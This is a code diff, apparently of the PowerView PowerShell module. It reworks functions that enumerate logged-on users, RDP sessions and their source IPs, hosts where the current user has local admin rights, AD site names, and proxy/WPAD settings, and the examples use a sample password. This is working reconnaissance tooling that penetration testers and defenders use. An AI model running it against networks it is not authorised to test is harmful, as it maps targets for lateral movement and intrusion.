+.EXAMPLE
 
-    .EXAMPLE
+Get-RegLoggedOn -ComputerName sqlserver
 
-        PS C:\> Get-LoggedOnLocal -ComputerName sqlserver
+Returns users actively logged onto the 'sqlserver' host.
 
-        Returns active sessions on the 'sqlserver' host.
+.EXAMPLE
 
+Get-DomainController | Get-RegLoggedOn
+
+Returns users actively logged on all domain controllers.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
+
+.OUTPUTS
+
+PowerView.RegLoggedOnUser
+
+A PSCustomObject including the UserDomain/UserName/UserSID of each
+actively logged on user, with the ComputerName added.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.RegLoggedOnUser')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
+        [String[]]
         $ComputerName = 'localhost'
     )
 
-    # process multiple host object types from the pipeline
-    $ComputerName = Get-NameField -Object $ComputerName
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
+    }
+
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            try {
+                # retrieve HKU remote registry values
+                $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName")
 
-    try {
-        # retrieve HKU remote registry values
-        $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName")
+                # sort out bogus sid's like _class
+                $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {
+                    $UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple'
 
-        # sort out bogus sid's like _class
-        $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {
-            $UserName = Convert-SidToName $_
+                    if ($UserName) {
+                        $UserName, $UserDomain = $UserName.Split('@')
+                    }
+                    else {
+                        $UserName = $_
+                        $UserDomain = $Null
+                    }
 
-            $Parts = $UserName.Split('\')
-            $UserDomain = $Null
-            $UserName = $Parts[-1]
-            if ($Parts.Length -eq 2) {
-                $UserDomain = $Parts[0]
+                    $RegLoggedOnUser = New-Object PSObject
+                    $RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName"
+                    $RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain
+                    $RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName
+                    $RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_
+                    $RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser')
+                    $RegLoggedOnUser
+                }
+            }
+            catch {
+                Write-Verbose "[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_"
             }
-
-            $LocalLoggedOnUser = New-Object PSObject
-            $LocalLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName"
-            $LocalLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain
-            $LocalLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName
-            $LocalLoggedOnUser | Add-Member Noteproperty 'UserSID' $_
-            $LocalLoggedOnUser
         }
     }
-    catch {
-        Write-Verbose "Error opening remote registry on '$ComputerName'"
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
     }
 }
 
 
-filter Get-NetRDPSession {
+function Get-NetRDPSession {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns remote desktop/session information for the local (or a remote) machine.
+
+Note: only members of the Administrators or Account Operators local group
+can successfully execute this functionality on a remote target.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  
+
+.DESCRIPTION
+
+This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
+Win32API calls to query a given RDP remote service for active sessions and originating
+IPs. This is a replacement for qwinsta.
+
+.PARAMETER ComputerName
 
-        This function will execute the WTSEnumerateSessionsEx and 
-        WTSQuerySessionInformation Win32API calls to query a given
-        RDP remote service for active sessions and originating IPs.
-        This is a replacement for qwinsta.
+Specifies the hostname to query for active sessions (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        Note: only members of the Administrators or Account Operators local group
-        can successfully execute this functionality on a remote target.
+.PARAMETER Credential
 
-    .PARAMETER ComputerName
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-        The hostname to query for active RDP sessions.
+.EXAMPLE
 
-    .EXAMPLE
+Get-NetRDPSession
 
-        PS C:\> Get-NetRDPSession
+Returns active RDP/terminal sessions on the local host.
 
-        Returns active RDP/terminal sessions on the local host.
+.EXAMPLE
 
-    .EXAMPLE
+Get-NetRDPSession -ComputerName "sqlserver"
 
-        PS C:\> Get-NetRDPSession -ComputerName "sqlserver"
+Returns active RDP/terminal sessions on the 'sqlserver' host.
 
-        Returns active RDP/terminal sessions on the 'sqlserver' host.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainController | Get-NetRDPSession
 
-        PS C:\> Get-NetDomainController | Get-NetRDPSession
+Returns active RDP/terminal sessions on all domain controllers.
 
-        Returns active RDP/terminal sessions on all domain controllers.
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetRDPSession -ComputerName sqlserver -Credential $Cred
+
+.OUTPUTS
+
+PowerView.RDPSessionInfo
+
+A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,
+with the ComputerName added.
+
+.LINK
+
+https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
 #>
 
+    [OutputType('PowerView.RDPSessionInfo')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
-        $ComputerName = 'localhost'
+        [String[]]
+        $ComputerName = 'localhost',
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
+    }
+
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
 
-    # open up a handle to the Remote Desktop Session host
-    $Handle = $Wtsapi32::WTSOpenServerEx($Computer)
+            # open up a handle to the Remote Desktop Session host
+            $Handle = $Wtsapi32::WTSOpenServerEx($Computer)
 
-    # if we get a non-zero handle back, everything was successful
-    if ($Handle -ne 0) {
+            # if we get a non-zero handle back, everything was successful
+            if ($Handle -ne 0) {
 
-        # arguments for WTSEnumerateSessionsEx
-        $ppSessionInfo = [IntPtr]::Zero
-        $pCount = 0
-        
-        # get information on all current sessions
-        $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+                # arguments for WTSEnumerateSessionsEx
+                $ppSessionInfo = [IntPtr]::Zero
+                $pCount = 0
 
-        # Locate the offset of the initial intPtr
-        $Offset = $ppSessionInfo.ToInt64()
+                # get information on all current sessions
+                $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
-        if (($Result -ne 0) -and ($Offset -gt 0)) {
+                # locate the offset of the initial intPtr
+                $Offset = $ppSessionInfo.ToInt64()
 
-            # Work out how much to increment the pointer by finding out the size of the structure
-            $Increment = $WTS_SESSION_INFO_1::GetSize()
+                if (($Result -ne 0) -and ($Offset -gt 0)) {
 
-            # parse all the result structures
-            for ($i = 0; ($i -lt $pCount); $i++) {
- 
-                # create a new int ptr at the given offset and cast the pointer as our result structure
-                $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
-                $Info = $NewIntPtr -as $WTS_SESSION_INFO_1
+                    # work out how much to increment the pointer by finding out the size of the structure
+                    $Increment = $WTS_SESSION_INFO_1::GetSize()
 
-                $RDPSession = New-Object PSObject
+                    # parse all the result structures
+                    for ($i = 0; ($i -lt $pCount); $i++) {
 
-                if ($Info.pHostName) {
-                    $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName
-                }
-                else {
-                    # if no hostname returned, use the specified hostname
-                    $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer
-                }
+                        # create a new int ptr at the given offset and cast the pointer as our result structure
+                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+                        $Info = $NewIntPtr -as $WTS_SESSION_INFO_1
 
-                $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName
+                        $RDPSession = New-Object PSObject
 
-                if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {
-                    # if a domain isn't returned just use the username
-                    $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)"
-                }
-                else {
-                    $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)"
-                }
+                        if ($Info.pHostName) {
+                            $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName
+                        }
+                        else {
+                            # if no hostname returned, use the specified hostname
+                            $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer
+                        }
 
-                $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID
-                $RDPSession | Add-Member Noteproperty 'State' $Info.State
+                        $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName
 
-                $ppBuffer = [IntPtr]::Zero
-                $pBytesReturned = 0
+                        if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {
+                            # if a domain isn't returned just use the username
+                            $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)"
+                        }
+                        else {
+                            $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)"
+                        }
 
-                # query for the source client IP with WTSQuerySessionInformation
-                #   https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
-                $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+                        $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID
+                        $RDPSession | Add-Member Noteproperty 'State' $Info.State
 
-                if($Result -eq 0) {
-                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError2).Message)"
-                }
-                else {
-                    $Offset2 = $ppBuffer.ToInt64()
-                    $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2
-                    $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS
+                        $ppBuffer = [IntPtr]::Zero
+                        $pBytesReturned = 0
 
-                    $SourceIP = $Info2.Address       
-                    if($SourceIP[2] -ne 0) {
-                        $SourceIP = [String]$SourceIP[2]+"."+[String]$SourceIP[3]+"."+[String]$SourceIP[4]+"."+[String]$SourceIP[5]
-                    }
-                    else {
-                        $SourceIP = $Null
-                    }
+                        # query for the source client IP with WTSQuerySessionInformation
+                        #   https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
+                        $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+                        if ($Result2 -eq 0) {
+                            Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)"
+                        }
+                        else {
+                            $Offset2 = $ppBuffer.ToInt64()
+                            $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2
+                            $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS
+
+                            $SourceIP = $Info2.Address
+                            if ($SourceIP[2] -ne 0) {
+                                $SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5]
+                            }
+                            else {
+                                $SourceIP = $Null
+                            }
 
-                    $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP
-                    $RDPSession
+                            $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP
+                            $RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo')
+                            $RDPSession
 
-                    # free up the memory buffer
-                    $Null = $Wtsapi32::WTSFreeMemory($ppBuffer)
+                            # free up the memory buffer
+                            $Null = $Wtsapi32::WTSFreeMemory($ppBuffer)
 
-                    $Offset += $Increment
+                            $Offset += $Increment
+                        }
+                    }
+                    # free up the memory result buffer
+                    $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)
                 }
+                else {
+                    Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+                }
+                # close off the service handle
+                $Null = $Wtsapi32::WTSCloseServer($Handle)
+            }
+            else {
+                Write-Verbose "[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName"
             }
-            # free up the memory result buffer
-            $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)
-        }
-        else {
-            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
         }
-        # Close off the service handle
-        $Null = $Wtsapi32::WTSCloseServer($Handle)
     }
-    else {
-        Write-Verbose "Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName"
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
     }
 }
 
 
-filter Invoke-CheckLocalAdminAccess {
+function Test-AdminAccess {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Tests if the current user has administrative access to the local (or a remote) machine.
+
+Idea stolen from the local_admin_search_enum post module in Metasploit written by:  
+    'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'  
+    'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'  
+    'Royce Davis "r3dy" <rdavis[at]accuvant.com>'  
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  
+
+.DESCRIPTION
+
+This function will use the OpenSCManagerW Win32API call to establish
+a handle to the remote host. If this succeeds, the current user context
+has local administrator acess to the target.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to check for local admin access (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        This function will use the OpenSCManagerW Win32API call to establish
-        a handle to the remote host. If this succeeds, the current user context
-        has local administrator acess to the target.
+.PARAMETER Credential
 
-        Idea stolen from the local_admin_search_enum post module in Metasploit written by:
-            'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
-            'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
-            'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-    .PARAMETER ComputerName
+.EXAMPLE
 
-        The hostname to query for active sessions.
+Test-AdminAccess -ComputerName sqlserver
 
-    .OUTPUTS
+Returns results indicating whether the current user has admin access to the 'sqlserver' host.
 
-        $True if the current user has local admin access to the hostname, $False otherwise
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainComputer | Test-AdminAccess
 
-        PS C:\> Invoke-CheckLocalAdminAccess -ComputerName sqlserver
+Returns what machines in the domain the current user has access to.
 
-        Returns active sessions on the local host.
+.EXAMPLE
 
-    .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Test-AdminAccess -ComputerName sqlserver -Credential $Cred
 
-        PS C:\> Get-NetComputer | Invoke-CheckLocalAdminAccess
+.OUTPUTS
 
-        Sees what machines in the domain the current user has access to.
+PowerView.AdminAccess
 
-    .LINK
+A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether
+the current user has local admin rights, along with the ComputerName added.
 
-        https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
-        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+.LINK
+
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
 #>
 
+    [OutputType('PowerView.AdminAccess')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
-        $ComputerName = 'localhost'
-    )
+        [String[]]
+        $ComputerName = 'localhost',
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-    # 0xF003F - SC_MANAGER_ALL_ACCESS
-    #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
-    $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
+    }
 
-    Write-Verbose "Invoke-CheckLocalAdminAccess handle: $Handle"
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # 0xF003F - SC_MANAGER_ALL_ACCESS
+            #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
+            $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
-    $IsAdmin = New-Object PSObject
-    $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer
+            $IsAdmin = New-Object PSObject
+            $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer
 
-    # if we get a non-zero handle back, everything was successful
-    if ($Handle -ne 0) {
-        $Null = $Advapi32::CloseServiceHandle($Handle)
-        $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True
-    }
-    else {
-        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
-        $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False
+            # if we get a non-zero handle back, everything was successful
+            if ($Handle -ne 0) {
+                $Null = $Advapi32::CloseServiceHandle($Handle)
+                $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True
+            }
+            else {
+                Write-Verbose "[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+                $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False
+            }
+            $IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess')
+            $IsAdmin
+        }
     }
 
-    $IsAdmin
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
+    }
 }
 
 
-filter Get-SiteName {
+function Get-NetComputerSiteName {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns the AD site where the local (or a remote) machine resides.
 
-        This function will use the DsGetSiteName Win32API call to look up the
-        name of the site where a specified computer resides.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  
 
-    .PARAMETER ComputerName
+.DESCRIPTION
 
-        The hostname to look the site up for, default to localhost.
+This function will use the DsGetSiteName Win32API call to look up the
+name of the site where a specified computer resides.
 
-    .EXAMPLE
+.PARAMETER ComputerName
 
-        PS C:\> Get-SiteName -ComputerName WINDOWS1
+Specifies the hostname to check the site for (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        Returns the site for WINDOWS1.testlab.local.
+.PARAMETER Credential
 
-    .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-        PS C:\> Get-NetComputer | Get-SiteName
+.EXAMPLE
 
-        Returns the sites for every machine in AD.
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
+
+Returns the site for WINDOWS1.testlab.local.
+
+.EXAMPLE
+
+Get-DomainComputer | Get-NetComputerSiteName
+
+Returns the sites for every machine in AD.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.ComputerSite
+
+A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
 #>
+
+    [OutputType('PowerView.ComputerSite')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
-        $ComputerName = $Env:ComputerName
-    )
+        [String[]]
+        $ComputerName = 'localhost',
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-    # if we get an IP address, try to resolve the IP to a hostname
-    if($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') {
-        $IPAddress = $Computer
-        $Computer = [System.Net.Dns]::GetHostByAddress($Computer)
-    }
-    else {
-        $IPAddress = @(Get-IPAddress -ComputerName $Computer)[0].IPAddress
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
     }
 
-    $PtrInfo = [IntPtr]::Zero
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # if we get an IP address, try to resolve the IP to a hostname
+            if ($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') {
+                $IPAddress = $Computer
+                $Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName
+            }
+            else {
+                $IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress
+            }
+
+            $PtrInfo = [IntPtr]::Zero
 
-    $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)
+            $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)
 
-    $ComputerSite = New-Object PSObject
-    $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer
-    $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress
+            $ComputerSite = New-Object PSObject
+            $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer
+            $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress
 
-    if ($Result -eq 0) {
-        $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)
-        $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename
-    }
-    else {
-        $ErrorMessage = "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
-        $ComputerSite | Add-Member Noteproperty 'SiteName' $ErrorMessage
-    }
+            if ($Result -eq 0) {
+                $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)
+                $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename
+            }
+            else {
+                Write-Verbose "[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+                $ComputerSite | Add-Member Noteproperty 'SiteName' ''
+            }
+            $ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite')
 
-    $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+            # free up the result buffer
+            $Null = $Netapi32::NetApiBufferFree($PtrInfo)
 
-    $ComputerSite
+            $ComputerSite
+        }
+    }
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
+    }
 }
 
 
-filter Get-LastLoggedOn {
+function Get-WMIRegProxy {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Enumerates the proxy server and WPAD conents for the current user.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+Enumerates the proxy server and WPAD specification for the current user
+on the local machine (default), or a machine specified with -ComputerName.
+It does this by enumerating settings from
+HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
+
+.PARAMETER ComputerName
+
+Specifies the system to enumerate proxy settings on. Defaults to the local host.
 
-        This function uses remote registry functionality to return
-        the last user logged onto a target machine.
+.PARAMETER Credential
 
-        Note: This function requires administrative rights on the
-        machine you're enumerating.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
 
-    .PARAMETER ComputerName
+.EXAMPLE
 
-        The hostname to query for the last logged on user.
-        Defaults to the localhost.
+Get-WMIRegProxy
 
-    .PARAMETER Credential
+ComputerName           ProxyServer            AutoConfigURL         Wpad
+------------           -----------            -------------         ----
+WINDOWS1               http://primary.test...
 
-        A [Management.Automation.PSCredential] object for the remote connection.
+.EXAMPLE
 
-    .EXAMPLE
+$Cred = Get-Credential "TESTLAB\administrator"
+Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
 
-        PS C:\> Get-LastLoggedOn
+ComputerName            ProxyServer            AutoConfigURL         Wpad
+------------            -----------            -------------         ----
+windows1.testlab.local  primary.testlab.local
 
-        Returns the last user logged onto the local machine.
+.INPUTS
 
-    .EXAMPLE
-        
-        PS C:\> Get-LastLoggedOn -ComputerName WINDOWS1
+String
 
-        Returns the last user logged onto WINDOWS1
+Accepts one or more computer name specification strings  on the pipeline (netbios or FQDN).
 
-    .EXAMPLE
-        
-        PS C:\> Get-NetComputer | Get-LastLoggedOn
+.OUTPUTS
 
-        Returns the last user logged onto all machines in the domain.
+PowerView.ProxySettings
+
+Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
 #>
 
+    [OutputType('PowerView.ProxySettings')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
-        $ComputerName = 'localhost',
+        [String[]]
+        $ComputerName = $Env:COMPUTERNAME,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            try {
+                $WmiArguments = @{
+                    'List' = $True
+                    'Class' = 'StdRegProv'
+                    'Namespace' = 'root\default'
+                    'Computername' = $Computer
+                    'ErrorAction' = 'Stop'
+                }
+                if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
 
-    # HKEY_LOCAL_MACHINE
-    $HKLM = 2147483650
+                $RegProvider = Get-WmiObject @WmiArguments
+                $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings'
 
-    # try to open up the remote registry key to grab the last logged on user
-    try {
+                # HKEY_CURRENT_USER
+                $HKCU = 2147483649
+                $ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue
+                $AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue
 
-        if($Credential) {
-            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue
-        }
-        else {
-            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue
-        }
-
-        $Key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI"
-        $Value = "LastLoggedOnUser"
-        $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue
+                $Wpad = ''
+                if ($AutoConfigURL -and ($AutoConfigURL -ne '')) {
+                    try {
+                        $Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL)
+                    }
+                    catch {
+                        Write-Warning "[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL"
+                    }
+                }
 
